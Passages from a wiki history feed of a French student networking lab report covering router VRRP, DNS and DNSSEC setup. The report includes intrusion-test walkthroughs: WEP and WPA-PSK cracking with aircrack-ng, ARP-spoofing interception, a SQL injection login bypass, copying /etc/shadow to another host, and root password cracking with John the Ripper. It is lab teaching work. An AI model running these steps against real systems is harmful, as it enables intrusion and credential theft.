 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
	     allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53848</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53848"/>
				<updated>2020-11-16T23:04:01Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
